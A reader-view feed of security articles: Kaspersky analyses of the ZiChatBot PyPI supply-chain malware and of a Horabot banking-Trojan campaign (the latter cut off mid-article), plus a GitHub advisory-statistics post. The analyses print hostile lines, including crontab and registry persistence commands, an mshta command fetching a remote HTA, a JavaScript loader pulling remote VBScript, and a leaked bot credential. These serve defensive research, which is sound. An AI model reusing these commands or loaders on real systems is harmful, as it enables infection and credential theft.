Visualização de leitura

OceanLotus suspected of using PyPI to deliver ZiChatBot malware

Introduction

Through our daily threat hunting, we noticed that, beginning in July 2025, a series of malicious wheel packages were uploaded to PyPI (the Python Package Index). We shared this information with the public security community, and the malware was removed from the repository. We submitted the samples to Kaspersky Threat Attribution Engine (KTAE) for analysis. Based on the results, we believe the packages may be linked to malware discussed in a Threat Intelligence report on OceanLotus.

While these wheel packages do implement the features described on their PyPI web pages, their true purpose is to covertly deliver malicious files. These files can be either .DLL or .SO (Linux shared library), indicating the packages’ ability to target both Windows and Linux platforms. They function as droppers, delivering the final payload – a previously unknown malware family that we have named ZiChatBot. Unlike traditional malware, ZiChatBot does not communicate with a dedicated command and control (C2) server, but instead uses a series of REST APIs from the public team chat app Zulip as its C2 infrastructure.

To conceal the malicious package containing ZiChatBot, the attacker created another benign-looking package that included the malicious package as a dependency. Based on these facts, we confirm that this campaign is a carefully planned and executed PyPI supply chain attack.

Technical details

Spreading

The attacker created three projects on PyPI and uploaded malicious wheel packages designed to imitate popular libraries, tricking users into downloading them. This is a clear example of a supply chain attack via PyPI. See below for detailed information about the fake libraries and their corresponding wheel packages.

Malicious wheel packages

The packages added by the attacker and listed on PyPI’s download pages are:

  • uuid32-utils library for generating a 32-character random string as a UUID
  • colorinal library for implementing cross-platform color terminal text
  • termncolor library for ANSI color format for terminal output

The key metadata for these packages are as follows:

Pip install command File name First upload date Author / Email
pip install uuid32-utils uuid32_utils-1.x.x-py3-none-[OS platform].whl 2025-07-16 laz**** / laz****@tutamail.com
pip install colorinal colorinal-0.1.7-py3-none-[OS platform].whl 2025-07-22 sym**** / sym****@proton.me
pip install termncolor termncolor-3.1.0-py3-none-any.whl 2025-07-22 sym**** / sym****@proton.me

Based on the distribution information on the PyPI web page, we can see that it offers X86 and X64 versions for Windows, as well as an x86_64 version for Linux. The colorinal project, for example, provides the following download options:

Distribution information of the colorinal project

Distribution information of the colorinal project

Initial infection

The uuid32-utils and colorinal libraries employ similar infection chains and malicious payloads. As a result, this analysis will focus on the colorinal library as a representative example.

A quick look at the code of the third library, termncolor, reveals no apparent malicious content. However, it imports the malicious colorinal library as a dependency. This method allows attackers to deeply conceal malware, making the termncolor library appear harmless when distributing it or luring targets.

The termncolor library imports the malicious colorinal library

The termncolor library imports the malicious colorinal library

During the initial infection stage, the Python code is nearly identical across both Windows and Linux platforms. Here, we analyze the Windows version as an example.

Windows version

Once a Python user downloads and installs the colorinal-0.1.7-py3-none-win_amd64.whl wheel package file, or installs it using the pip tool, the ZiChatBot’s dropper (a file named terminate.dll) will be extracted from the wheel package and placed on the victim’s hard drive.

After that, if the colorinal library is imported into the victim’s project, the Python script file at [Python library installation path]\colorinal-0.1.7-py3-none-win_amd64\colorinal\__init__.py will be executed first.

The __init__.py script imports the malicious file unicode.py

The __init__.py script imports the malicious file unicode.py

This Python script imports and executes another script located at [python library install path]\colorinal-0.1.7-py3-none-win_amd64\colorinal\unicode.py. The is_color_supported() function in unicode.py is called immediately.

The code loads the dropper into the host Python process

The code loads the dropper into the host Python process

The comment in the is_color_supported() function states that the highlighted code checks whether the user’s terminal environment supports color. The code actually loads the terminate.dll file into the Python process and then invokes the DLL’s exported function envir, passing the UTF-8-encoded string xterminalunicod as a parameter. The DLL acts as a dropper, delivering the final payload, ZiChatBot, and then self-deleting. At the end of the is_color_supported() function, the unicode.py script file is also removed. These steps eliminate all malicious files in the library and deploy ZiChatBot.
For the Linux platform, the wheel package and the unicode.py Python script are nearly identical to the Windows version. The only difference is that the dropper file is named “terminate.so”.

Dropper for ZiChatBot

From the previous analysis, we learned that the dropper is loaded into the host Python process by a Python script and then activated. The main logic of the dropper is implemented in the envir export function to achieve three objectives:

  1. Deploy ZiChatBot.
  2. Establish an auto-run mechanism.
  3. Execute shellcode to remove the dropper file (terminate.dll) and the malicious script file from the installed library folder.

The dropper first decrypts sensitive strings using AES in CBC mode. The key is the string-type parameter “xterminalunicode” of the exported function. The decrypted strings are “libcef.dll”, “vcpacket”, “pkt-update”, and “vcpktsvr.exe”.

Next, the malware uses the same algorithm to decrypt the embedded data related to ZiChatBot. It then decompresses the decrypted data with LZMA to retrieve the files vcpktsvr.exe and libcef.dll associated with ZiChatBot. The malware creates a folder named vcpacket in the system directory %LOCALAPPDATA%, and places these files into it.

To establish persistence for ZiChatBot, the dropper creates the following auto-run entry in the registry:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"pkt-update"="C:\Users\[User name]\AppData\Local\vcpacket\vcpktsvr.exe"

Once preparations are complete, the malware uses the XOR algorithm to decrypt the embedded shellcode with the three-byte key 3a7. It then searches the decrypted shellcode’s memory for the string Policy.dllcppage.dll and replaces it with its own file name, terminate.dll, and redirects execution to the shellcode’s memory space.

The shellcode employs a djb2-like hash method to calculate the names of certain APIs and locate their addresses. Using these APIs, it finds the dropper file with the name terminate.dll that was previously passed by the DLL before unloading and deleting it.

Linux version

The Linux version of the dropper places ZiChatBot in the path /tmp/obsHub/obs-check-update and then creates an auto-run job using crontab. Unlike the Windows version, the Linux version of ZiChatBot only consists of one ELF executable file.

system("chmod +x /tmp/obsHub/obs-check-update") 
system("echo \"5 * * * * /tmp/obsHub/obs-check-update" | crontab - ")

ZiChatBot

The Windows version of ZiChatBot is a DLL file (libcef.dll) that is loaded by the legitimate executable vcpktsvr.exe (hash: 48be833b0b0ca1ad3cf99c66dc89c3f4). The DLL contains several export functions, with the malicious code implemented in the cef_api_mash export. Once the DLL is loaded, this function is invoked by the EXE file. ZiChatBot uses the REST APIs from Zulip, a public team chat application, as its command and control server.

ZiChatBot is capable of executing shellcode received from the server and only supports this one control command. Once it runs, it initiates a series of sequential HTTP requests to the Zulip REST API.

In each HTTP request, an API authentication token is included as an HTTP header for server-side authentication, as shown below.

// Auth token:
TW9yaWFuLWJvdEBoZWxwZXIuenVsaXBjaGF0LmNvbTpVOFJFWGxJNktmOHFYQjlyUXpPUEJpSUE0YnJKNThxRw==

// Decoded Auth token
Morian-bot@helper.zulipchat.com:U8REXlI6Kf8qXB9rQzOPBiIA4brJ58qG

ZiChatBot utilizes two separate channel-topic pairs for its operations. One pair transmits current system information, and the other retrieves a message containing shellcode. Once the shellcode is received, a new thread is created to execute it. After executing the command, a heart emoji is sent in response to the original message to indicate the execution was successful.

Infrastructure

We did not find any traditional infrastructure, such as compromised servers or commercial VPS services and their associated IPs and domains. Instead, the malicious wheel packages were uploaded to the Python Package Index (PyPI), a public, shared Python library. The malware, ZiChatBot, leverages Zulip’s public team chat REST APIs as its command and control server.

The “helper” organization that the attacker had registered on the Zulip service has now been officially deactivated by Zulip. However, infected devices may still attempt to connect to the service, so to help you locate and cure them, we recommend adding the full URL helper.zulipchat.com to your denylist.

Victims

The malware was uploaded in July 2025. Upon discovering these attacks, we quickly released an update for our product to detect the relevant files and shared the necessary information with the public security community. As a result, the malicious software was swiftly removed from PyPI, and the organization registered on the Zulip service was officially deactivated. To date, we have not observed any infections based on our telemetry or public reports.

Zulip has officially deactivated the “helper” organization

Attribution

Based on the results from our KTAE system, the dropper used by ZiChatBot shows a 64% similarity to another dropper we analyzed in a TI report, which was linked to OceanLotus. Reverse engineering shows that both droppers use nearly identical algorithms and logic for to decrypt and decompress their embedded payloads.

Analysis results of dropper using KTAE system

Analysis results of dropper using KTAE system

Conclusions

As an active APT organization, OceanLotus primarily targets victims in the Asia-Pacific region. However, our previous reports have highlighted a growing trend of the group expanding its activities into the Middle East. Moreover, the attacks described in this report – executed through PyPI – target Python users worldwide. This demonstrates OceanLotus’s ongoing effort to broaden its attack scope.

In the first half of 2025, a public report revealed that the group launched a phishing campaign using GitHub. The recent PyPI-based supply chain attack likely continues this strategy. Although phishing emails are still a common initial infection method for OceanLotus, the group is also actively exploring new ways to compromise victims through diverse supply chain attacks.

Indicators of compromise

Additional information about this activity, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact intelreports@kaspersky.com.

Malicious wheel packages
termncolor-3.1.0-py3-none-any.whl
5152410aeef667ffaf42d40746af4d84

uuid32_utils-1.x.x-py3-none-xxxx.whl
0a5a06fa2e74a57fd5ed8e85f04a483a
e4a0ad38fd18a0e11199d1c52751908b
5598baa59c716590d8841c6312d8349e
968782b4feb4236858e3253f77ecf4b0
b55b6e364be44f27e3fecdce5ad69eca
02f4701559fc40067e69bb426776a54f
e200f2f6a2120286f9056743bc94a49d
22538214a3c917ff3b13a9e2035ca521

colorinal-0.1.7-py3-none-xxxx.whl
ba2f1868f2af9e191ebf47a5fab5cbab

Dropper for ZiChatBot
Backward.dll
c33782c94c29dd268a42cbe03542bca5
454b85dc32dc8023cd2be04e4501f16a

Backward.so
fce65c540d8186d9506e2f84c38a57c4
652f4da6c467838957de19eed40d39da

terminate.dll
1995682d600e329b7833003a01609252

terminate.so
38b75af6cbdb60127decd59140d10640

ZiChatBot
libcef.dll
a26019b68ef060e593b8651262cbd0f6

Q1 2026 Malware Statistics Report for Linux SSH Servers

Overview. ASEC analyzed the statistics of attacks against Linux SSH servers in Q1 2026 based on honeypot logs. The P2PInfect worm dominated, accounting for 70.3% of all attack sources, and DDoS bots such as Mirai, XMRig, Prometei, and CoinMiner were identified as the main threats. Purpose and Scope. the purpose of this report is to […]

A year of open source vulnerability trends: CVEs, advisories, and malware

GitHub published 4,101 reviewed advisories in 2025. This is the fewest number of reviewed advisories since 2021.  Does this mean open source is shipping more secure code? Let’s dig into the data to find out.

GitHub reviewed advisories

Fewer advisories reviewed doesn’t mean fewer vulnerabilities were reported. The drop is because GitHub reviewed far fewer older vulnerabilities. When you look only at newly reported vulnerabilities from our sources, GitHub actually reviewed 19% more advisories year over year.

Stacked bar graph showing the number of advisories published from GitHub's feeds and those published from the backfill campaigns.

Reviewed Year	From Feeds	From Backfill
2020	1145	1539
2021	1419	1412
2022	2731	1848
2023	3065	1792
2024	3142	2093
2025	3734	367

So why the change? Quite frankly, we are running out of unreviewed vulnerabilities that are older than the Advisory Database. At the same time, the number of newly reported vulnerabilities hasn’t dropped.

It’s also worth clarifying that “unreviewed” in the database can be misleading: most advisories marked unreviewed have already been looked at by a curator and found not to affect any package in a supported ecosystem, so they may never be fully reviewed.

Stacked line graph showing the cumulative number of advisories of each type over the years.

Year	Unreviewed	Reviewed	Malware	Withdrawn
2019	0	381	0	42
2020	0	3,065	0	101
2021	1,978	5,896	0	140
2022	177,369	10,475	7,433	195
2023	202,583	15,332	9,136	290
2024	238,642	20,567	13,404	413
2025	283,447	24,668	20,649	522

This means that you should be receiving fewer brand-new Dependabot alerts about old vulnerabilities. 

Note: If you find an unreviewed advisory that affects a supported package, please let us know so we can get it reviewed!

How vulnerabilities were distributed across ecosystems in 2025

The distribution of ecosystems in advisories reviewed in 2025 is similar to the overall distribution in the database, with the exception of Go. Go is overrepresented in 2025 advisories by 6%. This is largely due to dedicated campaigns to re-examine potentially missing advisories found through an internal review for packages where we had inconsistent coverage.

Circle graph showing the distributions of ecosystems of advisories reviewed in 2025.

Ecosystem	Proportion of 2025 Reviewed Advisories
Composer	19.40%
Erlang	0.22%
GitHub Actions	0.41%
Go	17.33%
Maven	22.24%
npm	14.92%
Nuget	2.33%
Pip	17.16%
RubyGems	1.47%
Rust	4.31%
Swift	0.22%
Circle graph showing the distributions of ecosystems of reviewed advisories across the entire GitHub Advisory Database.

Ecosystem	Proportion of All Reviewed Advisories
Composer	20.16%
Erlang	0.16%
GitHub Actions	0.15%
Go	10.91%
Maven	24.33%
npm	17.05%
Nuget	2.98%
Pip	16.33%
Pub	0.04%
RubyGems	3.60%
Rust	4.13%
Swift	0.17%

How the types of vulnerabilities changed in 2025

RankCommon Weakness Enumeration (CWE)Number of 2025 Advisories*Change in Rank from 2024Change in Rank from the Overall Database
1CWE-79672+0+0
2CWE-22214+2+1
3CWE-863169+9+8
4CWE-20154+1+1
5CWE-200145-2-1
6CWE-400144+4+0
7CWE-770136+7+10
8CWE-502134+5+1
9CWE-94119-3-1
10CWE-918103+5+8

* An advisory may have more than CWE. For example, an advisory might have both CWE-400 and CWE-770. It would then count for both.

As usual, cross-site scripting (CWE-79) is by far the most common vulnerability type. However, there are significant changes in the following areas. Resource exhaustion (CWE-400 and CWE-770), unsafe deserialization (CWE-502), and server-side request forgery (CWE-918) were unusually common in 2025. CWE-863 (“Incorrect Authorization”) saw a significant jump, but that is largely due to reclassification away from CWE-284 (“Improper Access Control”) and CWE-285 (“Improper Authorization”), which are higher level CWEs that the CWE program discourages using.

One of the biggest quality improvements in 2025 was more specific, more consistent CWE tagging. Advisories without any CWE dropped 85% (from 452 in 2024 to 65 in 2025). CWE-20 (“Improper Input Validation”) is still common, but in prior years it was often the only CWE listed on an advisory. 

In 2025, advisories far more often list CWE-20 plus one or more additional CWEs that describe the concrete failure mode. This added specificity makes the data more actionable for triage, prioritization, and remediation.

To find out how to filter Dependabot alerts by CWE, see our documentation on auto-triage rules.

How to prioritize your response

We provide two scoring systems for prioritization: 

Together, they can give you a head start on your risk assessment process.

Priority	CVSS	EPSS
Critical	392	11
High	1237	96
Moderate	1994	221
Low	475	1517
Very Low		1872

As you can see, when considering impact, most vulnerabilities skew moderate to high of the impact range. Low-impact vulnerabilities are likely more common than the CVSS data suggests but are often not considered worth the time and effort for researchers and maintainers to report. The EPSS scores for moderate to high impact vulnerabilities support this decision.

Priority	CVSS	EPSS
Critical	8	4
High	8	11
Moderate	2	3
Low	0	0
Very Low	0	0

So should you trust the EPSS or CVSS scores? To judge that, let’s look at how they match up to vulnerabilities in CISA’s Known Exploited Vulnerabilities Catalog. The exploited vulnerabilities are at least scored moderate, and most are critical or high. While CVSS has more of the exploited vulnerabilities as critical, it also has far more vulnerabilities in the range in general. Combining the two can help you prioritize which vulnerabilities to address to prevent exploitation.

npm malware advisories

2025 was a huge year for npm malware advisories. Due to large malware campaigns, such as SHA1-Hulud, GitHub saw a 69% increase in published malware advisories compared to 2024. This is the most malware advisories GitHub has published since our initial release of historical malware when we added support in 2022.

You can receive Dependabot alerts when your repositories depend on npm packages with known malicious versions. When you enable malware alerting, Dependabot matches your npm dependencies against malware advisories in the GitHub Advisory Database.

Bar graph showing the number of published malware advisories each year.

Publication Year	Published Malware Advisories
2022	7433
2023	1703
2024	4268
2025	7197

GitHub CVE Numbering Authority (CNA)

CVE publications

2025 was a big year for the GitHub, Inc. CNA. We saw a 35% increase in published CVE records, outpacing the overall CVE Project’s increase of 21%.

Bar graph showing the number of CVEs GitHub published year.

Published Year	CVEs Published in 2025
2020	509
2021	1047
2022	1297
2023	1784
2024	2152
2025	2903

In fact, we saw 10 to 16% growth every quarter. If this trend continues, GitHub will publish over 50% more CVEs in 2026.

Bar graph showing the number of CVEs published by GitHub each quarter in 2025.

2025 Published Quarter	Number of CVEs
Q1	598
Q2	660
Q3	762
Q4	883

You can help make that a reality by requesting a CVE from us the next time you publish a repository security advisory about a vulnerability!

Organizations using GitHub’s CNA

Every year, GitHub sees more organizations use its CNA services. 2025 is no exception with a 20% increase in new organizations requesting CVE IDs.

Bar graph showing the number of new organizations using GitHub for CVEs for each year.

First CVE Year	New Organizations Using GitHub for CVEs
2020	231
2021	303
2022	328
2023	444
2024	568
2025	679

Unlike reviewed global advisories, which are always mapped to packages in ecosystems we support, any maintainer on GitHub can request a CVE, even if they don’t publish that package to a supported ecosystem. In fact, 2025 is the first year that GitHub has published more CVEs from organizations that do not use a supported ecosystem than those that do.

Stacked bar graph showing the number of CVEs GitHub published for vulnerabilities affected supported packages vs CVEs that don’t.

Published Year	Does Not Affect an Advisory DB Supported Ecosystem	Affects Advisory DB Supported Ecosystem
2020	203	306
2021	382	665
2022	491	806
2023	827	957
2024	961	1191
2025	1480	1423

We would like to thank all 987 organizations that published CVEs with us in 2025 and highlight the top 10 most prolific organizations.

Top 10 organizations using the GitHub CNA
OrganizationNumber of 2025 CVEs
LabReDeS (WeGIA)*130
XWiki40
Frappe28
Discourse27
Enalean27
FreeScout*27
DataEase26
Nextcloud25
GLPI24
DNN Software*23

* Organizations that published CVEs through GitHub for the first time in 2025

Onward to 2026

The data from 2025 shows incredible growth: 

  • 4,101 reviewed advisories 
  • 7,197 malware advisories 
  • 2,903 CVEs published
  • 679 new organizations using our CNA services

These numbers represent real security improvements for millions of developers.

You can be part of this in 2026. Here’s how: 

1. Use our CNA services

Publishing CVEs shouldn’t be complicated. Request a CVE directly from your repository security advisory, and we’ll take care of curating and publishing it for you. It’s free, it’s fast, and it helps the entire ecosystem understand and respond to vulnerabilities.

2. Improve advisory accuracy

Found an unreviewed advisory affecting a supported package? See incorrect severity scores or missing affected versions? Suggest edits. Your edits will be reviewed by the Advisory Database team and ultimately, will help make the database more accurate for everyone. In 2025, 675 contributions from the community improved the quality of this data for the entire software industry!

3. Protect your projects

The most direct impact you can have is protecting your own code. Enable Dependabot to automatically receive security updates and explore GitHub Advanced Security for comprehensive protection.

4. Make reporting a vulnerability easier

Let researchers know how to report to you and what you will and will not accept by creating a security policy for your repository. Enable private vulnerability reporting to make the coordination process smooth and secure.

Let’s make 2026 even better. See you in next year’s review! 🚀

The post A year of open source vulnerability trends: CVEs, advisories, and malware appeared first on The GitHub Blog.

The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico

Introduction

In this installment of our SOC Files series, we will walk you through a targeted campaign that our MDR team identified and hunted down a few months ago. It involves a threat known as Horabot, a bundle consisting of an infamous banking Trojan, an email spreader, and a notably complex attack chain.

Although previous research has documented Horabot campaigns (here and here), our goal is to highlight how active this threat remains and to share some aspects not covered in those analyses.

The starting point

As usual, our story begins with an alert that popped up in one of our customers’ environments. The rule that triggered it is generic yet effective at detecting suspicious mshta activity. The case progressed from that initial alert, but fortunately ended on a positive note. Kaspersky Endpoint Security intervened, terminated the malicious process (via a proactive defense module (PDM)) and removed the related files before the threat could progress any further.

The incident was then brought up for discussion at one of our weekly meetings. That was enough to spark the curiosity of one of our analysts, who then delved deeper into the tradecraft behind this campaign.

The attack chain

After some research and a lot of poking around in the adversary infrastructure, our team managed to map out the end-to-end kill chain. In this section, we will break down each stage and explain how the operation unfolds.

Stage 1: Initial lure

Following the breadcrumbs observed in the reported incident, the activity appears to begin with a standard fake CAPTCHA page. In the incident mentioned above, this page was located at the URL https://evs.grupotuis[.]buzz/0capcha17/ (details about its content can be found here).

Fake CAPTCHA page at the URL https://evs.grupotuis[.]buzz/0capcha17/

Fake CAPTCHA page at the URL https://evs.grupotuis[.]buzz/0capcha17/

Similar to the Lumma and Amadey cases, this page instructs the user to open the Run dialog, paste a malicious command into it and then run it. Once deceived, the victim pastes a command similar to the one below:

mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

This command retrieved and executed an HTA file that contained the following:

It is essentially a small loader. When executed, it opens a blank window, then immediately pulls and runs an external JavaScript payload hosted on the attacker’s domain. The body contains a large block of random, meaningless text that serves purely as filler.

Stage 2: A pinch of server-side polymorphism

The payload loaded by the HTA file dynamically creates a new <script> element, sets its source to an external VBScript hosted on another attacker-controlled domain, and injects it into the <head> section of a page hardcoded in the HTA. You can see the full content of the page in the box below. Once appended, the external VBScript is immediately fetched and executed, advancing the attack to its next stage.

var scriptEle = document.createElement("script");
scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/ld1/"); 
scriptEle.setAttribute("type", "text/vbscript"); 
document.getElementsByTagName('head')[0].appendChild(scriptEle);

The next-stage VBS content resembles the example shown below. During our analysis, we observed the use of server-side polymorphism because each access to the same resource returned a slightly different version of the code while preserving the same functionality.

The script is obfuscated and employs a custom string encoding routine. Below is a more readable version with its strings decoded and replaced using a small Python script that replicates the decode_str() routine.

The script performs pretty much the same function as the initial HTA file. It reaches a JavaScript loader that injects and executes another polymorphic VBScript.

var scriptEle = document.createElement("script");
scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/"); 
scriptEle.setAttribute("type", "text/vbscript"); 
document.getElementsByTagName('head')[0].appendChild(scriptEle);

Unlike the first script, this one is significantly more complex, with more than 400 lines of code. It acts as the heavy lifter of the operation. Below is a brief summary of its key characteristics:

  • Heavy obfuscation: the script uses multiple layers of obfuscation to obscure its behavior.
  • Custom string decoder: employs the same decoding routine found in the first VBScript to reconstruct strings at runtime.
  • Anti-VM and “anti-Avast”: performs basic environment checks and terminates if a specific Avast folder or VM artifacts are detected.
  • Information gathering and exfiltration: collects the host IP, hostname, username, and OS version, then sends this data to a C2 server.
  • Download of additional components: retrieves an AutoIt executable, its compiler (Aut2Exe), a script (au3), and a blob file, placing them under the hardcoded path C:\Users\Public\LAPTOP-0QF0NEUP4.
  • PowerShell command execution: executes PowerShell commands that reach out to two different URLs (one unavailable and the other leading to the first stager of the spreader, which we describe later in this article).
  • Persistence setup: creates a LNK file and drops it into the Startup folder to maintain persistence.
  • Cleanup routines: removes temporary files and terminates selected processes.

During our analysis of the heavy lifter, specifically within the exfiltration routine, we identified where the collected data was being sent. After probing the associated URL and removing the “salvar.php” portion, we uncovered an exposed webpage where the adversary listed all their victims.

As you may have noticed, the table is in Brazilian Portuguese and lists victims dating back to May 2025 (this screenshot was taken in September 2025). In the “Localização” (location) column, the adversary even included the victims’ geographic coordinates, which are redacted in the screenshot. A quick breakdown shows that, of the 5384 victims, 5030 were located in Mexico, representing roughly 93% of the total.

Stage 3: The evil combination of AutoIT and a banking Trojan

It is now time to focus on the files downloaded by our heavy lifter. As previously mentioned, three AutoIT components were dropped on disk: the executable (AutoIT3), the compiler (Aut2Exe), and the script (au3), along with an encrypted blob file. Since we have access to the AutoIt script code, we can analyze its routines. However, it contains over 750 lines of heavily obfuscated code, so let’s focus only on what really matters.

The most important routine is responsible for decrypting the blob file (it uses AES-192 with a key derived from the seed value 99521487), loading it directly into memory, and then calling the exported function B080723_N. The decrypted blob is a DLL.

We also managed to replicate the decryption logic with a Python script and manually extract the DLL (0x6272EF6AC1DE8FB4BDD4A760BE7BA5ED). After initial triage and basic sandbox execution, we observed the following:

  • The sample is a well-known Delphi banking Trojan detected by several engines under different names, such as Casbaneiro, Ponteiro, Metamorfo, and Zusy.
  • It embeds two old OpenSSL libraries (libeay32.dll and ssleay32.dll) from the Indy Project, an open-source client/server communications library used to establish client/server HTTPS C2 communication.
  • It includes SQL commands used to harvest credentials from browsers.

Once loaded into memory, the Trojan sends several HTTP requests to different URLs:

URL Description
https://cgf.facturastbs[.]shop/0725/a/home (GET) A page containing an encrypted configuration
https://cfg.brasilinst[.]site/a/br/logs/index.php?CHLG (POST) A URL for posting host information, but in our lab tests the value was empty.
Request content example:
Host: ‘ ‘
https://aufal.filevexcasv[.]buzz/on7/index15.php (POST)
https://aufal.filevexcasv[.]buzz/on7all/index15.php (POST)
A URL used to post victim information
Request content example:
AT: ‘ Microsoft Windows 10 Pro FLARE-VM (64)bit REMFLARE-VM’
MD: 040825VS
https://cgf.facturastbs[.]shop/a/08/150822/au/at.html HTML lure page designed to trick the user into accessing a malicious link whose contents are also used as a PDF attachment during the email distribution phase.
https://upstar.pics/a/08/150822/up/up (GET) The resource was already unavailable at the time our testing was conducted.
https://cgf.midasx.site/a/08/150822/au/au (GET) The page containing the first stage leading to the spreader.

Since this malware family has been extensively documented in previous studies, we won’t reiterate its well-known functionality. Instead, we’ll focus on lesser-documented and newly observed features, including the malware’s encryption and protocol handling logic.

The sample implements a stateful XOR-subtraction cipher in the sub_00A86B64 subroutine, which is used to protect strings and decrypt HTTP data received from the C2. Unlike simple XOR, each byte of output here depends on both the key and the previous byte. In our sample, the key is the string "0xFF0wx8066h".

Key construction (left) and decryption logic (right)

Key construction (left) and decryption logic (right)

We can easily reimplement the logic of the routine in Python and integrate the following snippet into our workflow to automate string decryption:

def decrypt_string(encrypted_hex):
    key_string = "0xFF0wx8066h"
    key_index = 0
    result = ""
    
    current_key = int(encrypted_hex[0:2], 16)
    
    i = 2
    while i < len(encrypted_hex):
        next_key = int(encrypted_hex[i:i+2], 16)
        if key_index >= len(key_string):
            key_index = 0
        key_char = ord(key_string[key_index])
        xored_value = next_key ^ key_char
        
        if xored_value > current_key:
            decrypted_char = xored_value - current_key
        else:
            decrypted_char = (xored_value + 0xFF) - current_key
        
        result += chr(decrypted_char)
        current_key = next_key
        key_index += 1
        i += 2
    
    return result

Python implementation of the decryption routine

The encrypted strings are retrieved in three different ways: through indexed lookups using a global encrypted Delphi string list (also observed by our colleagues at ESET); via direct references to encrypted hex strings in the data section; through indirect references using pointer variables, adding an overhead when automating decryption with scripts.

Direct pointer (left), indirect pointer (right)

Direct pointer (left), indirect pointer (right)

Indexed strings via TStringList lookups

Indexed strings via TStringList lookups

The malware fetches its configuration by performing an HTTPS GET request to the hardcoded, encrypted C2 server. The server responds with a configuration, which is a raw HTTP response, consisting of several values, each individually encrypted with the aforementioned algorithm. The sample extracts specific parameters based on their position in the list.

Decrypted configuration values (root password redacted)

Decrypted configuration values (root password redacted)

To improve readability, the above screenshot has been edited to include the decrypted parameters, which are separated by double newlines.

Configuration retrieval and parsing are initiated in the sub_00AD2C70 subroutine where the first configuration value, the C2 socket connection setting (host;port), is extracted.

C2 socket address extraction

C2 socket address extraction

If parsing fails, the malware falls back to a hardcoded secondary C2 socket address. The socket connection is then established.

Fallback to hardcoded socket address (lifenews[.]pro:49569)

Fallback to hardcoded socket address (lifenews[.]pro:49569)

Additional configuration values are parsed in sub_00AD2918 and its subroutines. For example, in the decrypted C2 configuration shown above, parameter 5 contains the “UPON” string that triggers execution, and parameter 6 contains the PowerShell commands that are run when this string is used. Below is the portion of the routine that takes care of parsing this command:
Extracting value 5 and 6 from the configuration

Extracting value 5 and 6 from the configuration

In addition to HTTP communication, the malware supports raw socket communication using a custom protocol that encapsulates commands into tags such as <|SIMPLE_TAG|> or <|TAG|>Arg1<|>Arg2<<|>.

The client initiates the C2 connection in sub_00AD331C, where it establishes a TCP socket to the operator’s server and sends the "PRINCIPAL" command to request a control channel. After receiving an OK response, it follows up with an "Info" message containing system details. Once validated, the server replies with a "SocketMain" message containing a session ID, completing the handshake. All subsequent command handling occurs in sub_00AD373C, a central orchestrator routine that parses incoming messages and dispatches the malicious actions.

The sample, and therefore the protocol itself, is inherited, from the open-source Delphi Remote Access PC project, as our colleagues at ESET have noted in the past. Below is a visual comparison:

Comparison of "PING" and "Close" commands (sample disassembly on the left, Delphi Remote Access source code on the right)

Comparison of “PING” and “Close” commands (sample disassembly on the left, Delphi Remote Access source code on the right)

Some features from the open-source project, including the chat and file manipulation commands, have been removed, while some mouse-related commands have been renamed with playful prefixes like “LULUZ” (e.g., LULUZLD, LULUZPos). This could be an inside joke, anti-analysis obfuscation, or a way to mark custom variants. Beyond the standard functionality, the protocol now includes a range of additional custom commands, such as LULUZSD for mouse wheel scrolling down, ENTERMANDA to simulate pressing the Enter key, and COLADIFKEYBOARD to inject arbitrary text as keystrokes.

The full command set is considerably larger, and while not all commands are implemented in the analyzed sample, evidence of their presence (e.g., in the form of strings) suggests ongoing development.

After getting a sense of the protocol, let’s focus on the cipher used. In this sample, traffic exchanged via the C2 socket channel is encrypted using another stateful XOR algorithm with embedded decryption keys. Its logic is implemented in the routines sub_00A9F2D0 (encryption) and sub_00A9F5C0 (decryption):

Encryption routine sub_00A9F2D0

Encryption routine sub_00A9F2D0

The encryption routine generates three random four-digit integer keys. The first key acts as the initial cipher state, while the other two serve as the multiplier and increment that are applied at every encryption stage to both the state and the data. For each character in the input string, it takes the high byte of the current state, XORs it with the character to encrypt, and then updates the cipher state for the next character. The output is created by prepending the three keys to the ciphertext, encapsulating everything within the “##” markers. The final output looks like this:

##[key1][key2][key3][encrypted_hex_data]##

Here’s a Python snippet to decode such traffic:

def deobfuscate_traffic(obfuscated):
    if not (obfuscated.startswith("##") and obfuscated.endswith("##")):
        raise ValueError("Invalid format")

    core = obfuscated[2:-2]
    
    key1 = int(core[0:4])
    key2 = int(core[4:8])
    key3 = int(core[8:12])
    
    hex_data = core[12:]
    
    current_key = key1
    output_chars = []
    
    for i in range(0, len(hex_data), 2):
        xored = int(hex_data[i:i+2], 16)
        
        high_byte = (current_key >> 8) & 0xFF
        original_char = chr(xored ^ high_byte)
        output_chars.append(original_char)
        
        current_key = ((current_key + xored) * key2 + key3) & 0xFFFF
    
    return "".join(output_chars)

Although this encryption layer was likely intended to evade network inspection, it ironically makes detection easier due to its highly regular and repetitive structure. This pattern, including the external markers “##”, is uncommon in legitimate traffic and can be used as a reliable network signature for IDS/IPS systems. Below is a Suricata rule that matches the described structure:

alert tcp any any -> any any ( \
    msg:"Horabot C2 socket communication (##hex##)"; \
    flow:established; \
    content:"##"; depth:2; fast_pattern; \
    content:"##"; endswith; \
    pcre:"/^##[1-9][0-9]{3}[1-9][0-9]{3}[1-9][0-9]{3}[0-9A-F]+##$/"; \
    classtype:trojan-activity; \
    sid:1900000; \
    rev:1; \
    metadata:author Domenico; \
)

As documented by our colleagues at Fortinet, the malware contains functionality to display fake pop-ups prompting victims to enter their banking credentials. The images for these pop-ups are stored as encrypted resources. Unlike strings, resources are decrypted using the standard RC4 cipher, and the key pega-avisao3234029284 is retrieved from the previous TStringList structure at offset 3FEh.

Fake token overlay used for credential theft (right), with disassembly (left)

Fake token overlay used for credential theft (right), with disassembly (left)

The wordplay around “pega a visão”, Brazilian slang meaning “get the picture” figuratively, reveals an intentional cultural reference, supporting the already well-known Brazilian ties of the operators who have a native understanding of the language.

Below is a collage of pictures where the targeted bank overlays are visible.

Excerpt of decrypted fake overlays

Excerpt of decrypted fake overlays

Stage 4: The spreader

In our tests, we noticed that both the VBScript (the heavy lifter) and the Delphi DLL have overlapping functionality for downloading the next stage via PowerShell. Although they rely on different domains, they follow the same URL pattern.

